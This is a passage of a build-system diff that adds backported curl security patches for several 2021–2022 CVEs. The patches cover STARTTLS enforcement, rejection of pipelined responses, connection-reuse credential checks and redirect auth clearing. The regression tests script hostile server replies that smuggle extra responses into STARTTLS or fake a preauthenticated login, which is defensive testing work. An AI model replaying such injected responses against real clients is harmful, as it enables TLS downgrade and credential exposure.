+ The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says:
+@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ }
+ #endif
+
+- if(data->set.use_ssl &&
+- (!conn->ssl[FIRSTSOCKET].use ||
+- (conn->bits.proxy_ssl_connected[FIRSTSOCKET] &&
+- !conn->proxy_ssl[FIRSTSOCKET].use))) {
+- /* We don't have a SSL/TLS connection yet, but FTPS is
++ if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) {
++ /* We don't have a SSL/TLS control connection yet, but FTPS is
+ requested. Try a FTPS connection now */
+
+ ftpc->count3 = 0;
+@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ result = Curl_ssl_connect(conn, FIRSTSOCKET);
+ if(!result) {
+ conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */
++ conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */
+ result = ftp_state_user(conn);
+ }
+ }
+@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn)
+ *
+ */
+ static CURLcode ftp_connect(struct connectdata *conn,
+- bool *done) /* see description above */
++ bool *done) /* see description above */
+ {
+ CURLcode result;
+ struct ftp_conn *ftpc = &conn->proto.ftpc;
+@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn,
+ result = Curl_ssl_connect(conn, FIRSTSOCKET);
+ if(result)
+ return result;
++ conn->bits.ftp_use_control_ssl = TRUE;
+ }
+
+ Curl_pp_init(pp); /* init the generic pingpong data */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ff2d686..d1fb4a9 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -461,6 +461,7 @@ struct ConnectBits {
+ EPRT doesn't work we disable it for the forthcoming
+ requests */
+ BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */
++ BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */
+ #endif
+ BIT(netrc); /* name+password provided by netrc */
+ BIT(userpwd_in_url); /* name+password found in url */
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
new file mode 100644
index 0000000000..98032d8b78
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
@@ -0,0 +1,328 @@
+Backport of:
+
+From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Wed, 8 Sep 2021 11:56:22 +0200
+Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd
+
+In imap and pop3, check if TLS is required even when capabilities
+request has failed.
+
+In ftp, ignore preauthentication (230 status of server greeting) if TLS
+is required.
+
+Bug: https://curl.se/docs/CVE-2021-22946.html
+Upstream-Status: Backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+CVE: CVE-2021-22946
+---
+ lib/ftp.c | 9 ++++---
+ lib/imap.c | 24 ++++++++----------
+ lib/pop3.c | 33 +++++++++++-------------
+ tests/data/Makefile.inc | 2 ++
+ tests/data/test984 | 56 +++++++++++++++++++++++++++++++++++++++++
+ tests/data/test985 | 54 +++++++++++++++++++++++++++++++++++++++
+ tests/data/test986 | 53 ++++++++++++++++++++++++++++++++++++++
+ 7 files changed, 195 insertions(+), 36 deletions(-)
+ create mode 100644 tests/data/test984
+ create mode 100644 tests/data/test985
+ create mode 100644 tests/data/test986
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 677527f..91b43d8 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ /* we have now received a full FTP server response */
+ switch(ftpc->state) {
+ case FTP_WAIT220:
+- if(ftpcode == 230)
+- /* 230 User logged in - already! */
+- return ftp_state_user_resp(conn, ftpcode, ftpc->state);
++ if(ftpcode == 230) {
++ /* 230 User logged in - already! Take as 220 if TLS required. */
++ if(data->set.use_ssl <= CURLUSESSL_TRY ||
++ conn->bits.ftp_use_control_ssl)
++ return ftp_state_user_resp(conn, ftpcode, ftpc->state);
++ }
+ else if(ftpcode != 220) {
+ failf(data, "Got a %03d ftp-server response when 220 was expected",
+ ftpcode);
+diff --git a/lib/imap.c b/lib/imap.c
+index 66172bd..9880ce1 100644
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn,
+ line += wordlen;
+ }
+ }
+- else if(imapcode == IMAP_RESP_OK) {
+- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
+- /* We don't have a SSL/TLS connection yet, but SSL is requested */
+- if(imapc->tls_supported)
+- /* Switch to TLS connection now */
+- result = imap_perform_starttls(conn);
+- else if(data->set.use_ssl == CURLUSESSL_TRY)
+- /* Fallback and carry on with authentication */
+- result = imap_perform_authentication(conn);
+- else {
+- failf(data, "STARTTLS not supported.");
+- result = CURLE_USE_SSL_FAILED;
+- }
++ else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
++ /* PREAUTH is not compatible with STARTTLS. */
++ if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) {
++ /* Switch to TLS connection now */
++ result = imap_perform_starttls(conn);
+ }
+- else
++ else if(data->set.use_ssl <= CURLUSESSL_TRY)
+ result = imap_perform_authentication(conn);
++ else {
++ failf(data, "STARTTLS not available.");
++ result = CURLE_USE_SSL_FAILED;
++ }
+ }
+ else
+ result = imap_perform_authentication(conn);
+diff --git a/lib/pop3.c b/lib/pop3.c
+index 57c1373..145b2b4 100644
+--- a/lib/pop3.c
++++ b/lib/pop3.c
+@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code,
+ }
+ }
+ }
+- else if(pop3code == '+') {
+- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
+- /* We don't have a SSL/TLS connection yet, but SSL is requested */
+- if(pop3c->tls_supported)
+- /* Switch to TLS connection now */
+- result = pop3_perform_starttls(conn);
+- else if(data->set.use_ssl == CURLUSESSL_TRY)
+- /* Fallback and carry on with authentication */
+- result = pop3_perform_authentication(conn);
+- else {
+- failf(data, "STLS not supported.");
+- result = CURLE_USE_SSL_FAILED;
+- }
+- }
+- else
+- result = pop3_perform_authentication(conn);
+- }
+ else {
+ /* Clear text is supported when CAPA isn't recognised */
+- pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
++ if(pop3code != '+')
++ pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
+
+- result = pop3_perform_authentication(conn);
++ if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use)
++ result = pop3_perform_authentication(conn);
++ else if(pop3code == '+' && pop3c->tls_supported)
++ /* Switch to TLS connection now */
++ result = pop3_perform_starttls(conn);
++ else if(data->set.use_ssl <= CURLUSESSL_TRY)
++ /* Fallback and carry on with authentication */
++ result = pop3_perform_authentication(conn);
++ else {
++ failf(data, "STLS not supported.");
++ result = CURLE_USE_SSL_FAILED;
++ }
+ }
+
+ return result;
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index f9535a6..0fa6799 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
+ test954 test955 test956 test957 test958 test959 test960 test961 test962 \
+ test963 test964 test965 test966 test967 test968 test969 \
+ \
++test984 test985 test986 \
++\
+ test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
+ test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \
+ test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \
+diff --git a/tests/data/test984 b/tests/data/test984
+new file mode 100644
+index 0000000..e573f23
+--- /dev/null
++++ b/tests/data/test984
+@@ -0,0 +1,56 @@
++<testcase>
++<info>
++<keywords>
++IMAP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY CAPABILITY A001 BAD Not implemented
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++imap
++</server>
++ <name>
++IMAP require STARTTLS with failing capabilities
++ </name>
++ <command>
++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd
++</command>
++<file name="log/upload%TESTNUMBER">
++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
++From: Fred Foobar <foobar@example.COM>
++Subject: afternoon meeting
++To: joe@example.com
++Message-Id: <B27397-0100000@example.COM>
++MIME-Version: 1.0
++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
++
++Hello Joe, do you think we can meet at 3:30 tomorrow?
++</file>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++A001 CAPABILITY
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test985 b/tests/data/test985
+new file mode 100644
+index 0000000..d0db4aa
+--- /dev/null
++++ b/tests/data/test985
+@@ -0,0 +1,54 @@
++<testcase>
++<info>
++<keywords>
++POP3
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY CAPA -ERR Not implemented
++</servercmd>
++<data nocheck="yes">
++From: me@somewhere
++To: fake@nowhere
++
++body
++
++--
++ yours sincerely
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++pop3
++</server>
++ <name>
++POP3 require STARTTLS with failing capabilities
++ </name>
++ <command>
++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd
++ </command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++CAPA
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test986 b/tests/data/test986
+new file mode 100644
+index 0000000..a709437
+--- /dev/null
++++ b/tests/data/test986
+@@ -0,0 +1,53 @@
++<testcase>
++<info>
++<keywords>
++FTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY welcome 230 Welcome
++REPLY AUTH 500 unknown command
++</servercmd>
++</reply>
++
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++ftp
++</server>
++ <name>
++FTP require STARTTLS while preauthenticated
++ </name>
++<file name="log/test%TESTNUMBER.txt">
++data
++ to
++ see
++that FTPS
++works
++ so does it?
++</file>
++ <command>
++--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret
++</command>
++</client>
++
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++AUTH SSL
++AUTH TLS
++</protocol>
++</verify>
++</testcase>
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
new file mode 100644
index 0000000000..070a328e27
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
@@ -0,0 +1,352 @@
+Backport of:
+
+From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Tue, 7 Sep 2021 13:26:42 +0200
+Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response
+ pipelining
+
+If a server pipelines future responses within the STARTTLS response, the
+former are preserved in the pingpong cache across TLS negotiation and
+used as responses to the encrypted commands.
+
+This fix detects pipelined STARTTLS responses and rejects them with an
+error.
+
+Bug: https://curl.se/docs/CVE-2021-22947.html
+Upstream-Status: Backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+CVE: CVE-2021-22947
+
+---
+ lib/ftp.c | 3 +++
+ lib/imap.c | 4 +++
+ lib/pop3.c | 4 +++
+ lib/smtp.c | 4 +++
+ tests/data/Makefile.inc | 2 ++
+ tests/data/test980 | 52 ++++++++++++++++++++++++++++++++++++
+ tests/data/test981 | 59 +++++++++++++++++++++++++++++++++++++++++
+ tests/data/test982 | 57 +++++++++++++++++++++++++++++++++++++++
+ tests/data/test983 | 52 ++++++++++++++++++++++++++++++++++++
+ 9 files changed, 237 insertions(+)
+ create mode 100644 tests/data/test980
+ create mode 100644 tests/data/test981
+ create mode 100644 tests/data/test982
+ create mode 100644 tests/data/test983
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 91b43d8..31a34e8 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ case FTP_AUTH:
+ /* we have gotten the response to a previous AUTH command */
+
++ if(pp->cache_size)
++ return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. */
++
+ /* RFC2228 (page 5) says:
+ *
+ * If the server is willing to accept the named security mechanism,
+diff --git a/lib/imap.c b/lib/imap.c
+index 9880ce1..0ca700f 100644
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.imapc.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(imapcode != IMAP_RESP_OK) {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied");
+diff --git a/lib/pop3.c b/lib/pop3.c
+index 145b2b4..8a2d52e 100644
+--- a/lib/pop3.c
++++ b/lib/pop3.c
+@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.pop3c.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(pop3code != '+') {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied");
+diff --git a/lib/smtp.c b/lib/smtp.c
+index e187287..66183e2 100644
+--- a/lib/smtp.c
++++ b/lib/smtp.c
+@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn,
+
+ (void)instate; /* no use for this yet */
+
++ /* Pipelining in response is forbidden. */
++ if(data->conn->proto.smtpc.pp.cache_size)
++ return CURLE_WEIRD_SERVER_REPLY;
++
+ if(smtpcode != 220) {
+ if(data->set.use_ssl != CURLUSESSL_TRY) {
+ failf(data, "STARTTLS denied, code %d", smtpcode);
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 0fa6799..60e8176 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
+ test954 test955 test956 test957 test958 test959 test960 test961 test962 \
+ test963 test964 test965 test966 test967 test968 test969 \
+ \
++test980 test981 test982 test983 \
++\
+ test984 test985 test986 \
+ \
+ test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
+diff --git a/tests/data/test980 b/tests/data/test980
+new file mode 100644
+index 0000000..97567f8
+--- /dev/null
++++ b/tests/data/test980
+@@ -0,0 +1,52 @@
++<testcase>
++<info>
++<keywords>
++SMTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STARTTLS
++AUTH PLAIN
++REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted
++REPLY AUTH 535 5.7.8 Authentication credentials invalid
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++smtp
++</server>
++ <name>
++SMTP STARTTLS pipelined server response
++ </name>
++<stdin>
++mail body
++</stdin>
++ <command>
++smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T -
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++EHLO %TESTNUMBER
++STARTTLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test981 b/tests/data/test981
+new file mode 100644
+index 0000000..2b98ce4
+--- /dev/null
++++ b/tests/data/test981
+@@ -0,0 +1,59 @@
++<testcase>
++<info>
++<keywords>
++IMAP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STARTTLS
++REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted
++REPLY LOGIN A003 BAD Authentication credentials invalid
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++imap
++</server>
++ <name>
++IMAP STARTTLS pipelined server response
++ </name>
++ <command>
++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl
++</command>
++<file name="log/upload%TESTNUMBER">
++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
++From: Fred Foobar <foobar@example.COM>
++Subject: afternoon meeting
++To: joe@example.com
++Message-Id: <B27397-0100000@example.COM>
++MIME-Version: 1.0
++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
++
++Hello Joe, do you think we can meet at 3:30 tomorrow?
++</file>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++A001 CAPABILITY
++A002 STARTTLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test982 b/tests/data/test982
+new file mode 100644
+index 0000000..9e07cc0
+--- /dev/null
++++ b/tests/data/test982
+@@ -0,0 +1,57 @@
++<testcase>
++<info>
++<keywords>
++POP3
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STLS USER
++REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated
++REPLY PASS -ERR Authentication credentials invalid
++</servercmd>
++<data nocheck="yes">
++From: me@somewhere
++To: fake@nowhere
++
++body
++
++--
++ yours sincerely
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++pop3
++</server>
++ <name>
++POP3 STARTTLS pipelined server response
++ </name>
++ <command>
++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl
++ </command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++CAPA
++STLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test983 b/tests/data/test983
+new file mode 100644
+index 0000000..300ec45
+--- /dev/null
++++ b/tests/data/test983
+@@ -0,0 +1,52 @@
++<testcase>
++<info>
++<keywords>
++FTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY AUTH 500 unknown command\r\n500 unknown command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete
++REPLY PASS 530 Login incorrect
++</servercmd>
++</reply>
++
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++ftp
++</server>
++ <name>
++FTP STARTTLS pipelined server response
++ </name>
++<file name="log/test%TESTNUMBER.txt">
++data
++ to
++ see
++that FTPS
++works
++ so does it?
++</file>
++ <command>
++--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP
++</command>
++</client>
++
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++AUTH SSL
++</protocol>
++</verify>
++</testcase>
diff --git a/meta/recipes-support/curl/curl/CVE-2022-22576.patch b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
new file mode 100644
index 0000000000..13479e7f0e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
@@ -0,0 +1,148 @@
+From 852aa5ad351ea53e5f01d2f44b5b4370c2bf5425 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 25 Apr 2022 11:44:05 +0200
+Subject: [PATCH] url: check sasl additional parameters for connection reuse.
+
+Also move static function safecmp() as non-static Curl_safecmp() since
+its purpose is needed at several places.
+
+Bug: https://curl.se/docs/CVE-2022-22576.html
+
+CVE-2022-22576
+
+Closes #8746
+---
+ lib/strcase.c | 10 ++++++++++
+ lib/strcase.h | 2 ++
+ lib/url.c | 13 ++++++++++++-
+ lib/urldata.h | 1 +
+ lib/vtls/vtls.c | 21 ++++++---------------
+ 5 files changed, 31 insertions(+), 16 deletions(-)
+
+CVE: CVE-2022-22576
+Upstream-Status: Backport [https://github.com/curl/curl/commit/852aa5ad351ea53e5f01d2f44b5b4370c2bf5425.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/strcase.c b/lib/strcase.c
+index dd46ca1ba0e5..692a3f14aee7 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -251,6 +251,16 @@
+ } while(*src++ && --n);
+ }
+
++/* Compare case-sensitive NUL-terminated strings, taking care of possible
++ * null pointers. Return true if arguments match.
++ */
++bool Curl_safecmp(char *a, char *b)
++{
++ if(a && b)
++ return !strcmp(a, b);
++ return !a && !b;
++}
++
+ /* --- public functions --- */
+
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index b234d3815220..2635f5117e99 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -48,4 +48,6 @@
+ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+
++bool Curl_safecmp(char *a, char *b);
++
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9a988b4d58d8..e1647b133854 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -730,6 +730,7 @@
+ Curl_safefree(conn->allocptr.host);
+ Curl_safefree(conn->allocptr.cookiehost);
+ Curl_safefree(conn->allocptr.rtsp_transport);
++ Curl_safefree(conn->oauth_bearer);
+ Curl_safefree(conn->trailer);
+ Curl_safefree(conn->host.rawalloc); /* host name buffer */
+ Curl_safefree(conn->conn_to_host.rawalloc); /* host name buffer */
+@@ -1251,7 +1252,9 @@
+ /* This protocol requires credentials per connection,
+ so verify that we're using the same name and password as well */
+ if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd)) {
++ strcmp(needle->passwd, check->passwd) ||
++ !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
++ !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
+ /* one of them was different */
+ continue;
+ }
+@@ -3392,6 +3395,14 @@
+ result = CURLE_OUT_OF_MEMORY;
+ goto out;
+ }
++ }
++
++ if(data->set.str[STRING_BEARER]) {
++ conn->oauth_bearer = strdup(data->set.str[STRING_BEARER]);
++ if(!conn->oauth_bearer) {
++ result = CURLE_OUT_OF_MEMORY;
++ goto out;
++ }
+ }
+
+ #ifdef USE_UNIX_SOCKETS
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 07eb19b87034..1d89b8d7fa68 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -949,6 +949,8 @@
+
+ char *sasl_authzid; /* authorisation identity string, allocated */
+
++ char *oauth_bearer; /* OAUTH2 bearer, allocated */
++
+ int httpversion; /* the HTTP version*10 reported by the server */
+ int rtspversion; /* the RTSP version*10 reported by the server */
+
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index 03b85ba065e5..a40ac06f684f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,15 +82,6 @@
+ else \
+ dest->var = NULL;
+
+-static bool safecmp(char *a, char *b)
+-{
+- if(a && b)
+- return !strcmp(a, b);
+- else if(!a && !b)
+- return TRUE; /* match */
+- return FALSE; /* no match */
+-}
+-
+
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+@@ -101,12 +101,12 @@
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
+- safecmp(data->CApath, needle->CApath) &&
+- safecmp(data->CAfile, needle->CAfile) &&
+- safecmp(data->issuercert, needle->issuercert) &&
+- safecmp(data->clientcert, needle->clientcert) &&
+- safecmp(data->random_file, needle->random_file) &&
+- safecmp(data->egdsocket, needle->egdsocket) &&
++ Curl_safecmp(data->CApath, needle->CApath) &&
++ Curl_safecmp(data->CAfile, needle->CAfile) &&
++ Curl_safecmp(data->issuercert, needle->issuercert) &&
++ Curl_safecmp(data->clientcert, needle->clientcert) &&
++ Curl_safecmp(data->random_file, needle->random_file) &&
++ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
new file mode 100644
index 0000000000..063c11712a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
@@ -0,0 +1,45 @@
+From 2a797e099731facf62a2c675396334bc2ad3bc7c Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] connect: store "conn_remote_port" in the info struct
+
+To make it available after the connection ended.
+
+Prerequisite for the patches that address CVE-2022-27774.
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/08b8ef4e726ba10f45081ecda5b3cea788d3c839]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/connect.c | 1 +
+ lib/urldata.h | 6 +++++-
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index b3d4057..a977d67 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -624,6 +624,7 @@ void Curl_persistconninfo(struct connectdata *conn)
+ conn->data->info.conn_scheme = conn->handler->scheme;
+ conn->data->info.conn_protocol = conn->handler->protocol;
+ conn->data->info.conn_primary_port = conn->primary_port;
++ conn->data->info.conn_remote_port = conn->remote_port;
+ conn->data->info.conn_local_port = conn->local_port;
+ }
+
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fafb7a3..ab1b267 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1148,7 +1148,11 @@ struct PureInfo {
+ reused, in the connection cache. */
+
+ char conn_primary_ip[MAX_IPADR_LEN];
+- long conn_primary_port;
++ long conn_primary_port; /* this is the destination port to the connection,
++ which might have been a proxy */
++ long conn_remote_port; /* this is the "remote port", which is the port
++ number of the used URL, independent of proxy or
++ not */
+ char conn_local_ip[MAX_IPADR_LEN];
+ long conn_local_port;
+ const char *conn_scheme;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
new file mode 100644
index 0000000000..c64d614194
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
@@ -0,0 +1,80 @@
+From 5c2f3b3a5f115625134669d90d591de9c5aafc8e Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] transfer: redirects to other protocols or ports clear auth
+
+... unless explicitly permitted.
+
+Bug: https://curl.se/docs/CVE-2022-27774.html
+Reported-by: Harry Sintonen
+Closes #8748
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/620ea21410030a9977396b4661806bc187231b79]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/transfer.c | 49 ++++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 48 insertions(+), 1 deletion(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index 744e1c0..ac69d27 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1627,10 +1627,57 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ return CURLE_OUT_OF_MEMORY;
+ }
+ else {
+-
+ uc = curl_url_get(data->state.uh, CURLUPART_URL, &newurl, 0);
+ if(uc)
+ return Curl_uc_to_curlcode(uc);
++
++ /* Clear auth if this redirects to a different port number or protocol,
++ unless permitted */
++ if(!data->set.allow_auth_to_other_hosts && (type != FOLLOW_FAKE)) {
++ char *portnum;
++ int port;
++ bool clear = FALSE;
++
++ if(data->set.use_port && data->state.allow_port)
++ /* a custom port is used */
++ port = (int)data->set.use_port;
++ else {
++ uc = curl_url_get(data->state.uh, CURLUPART_PORT, &portnum,
++ CURLU_DEFAULT_PORT);
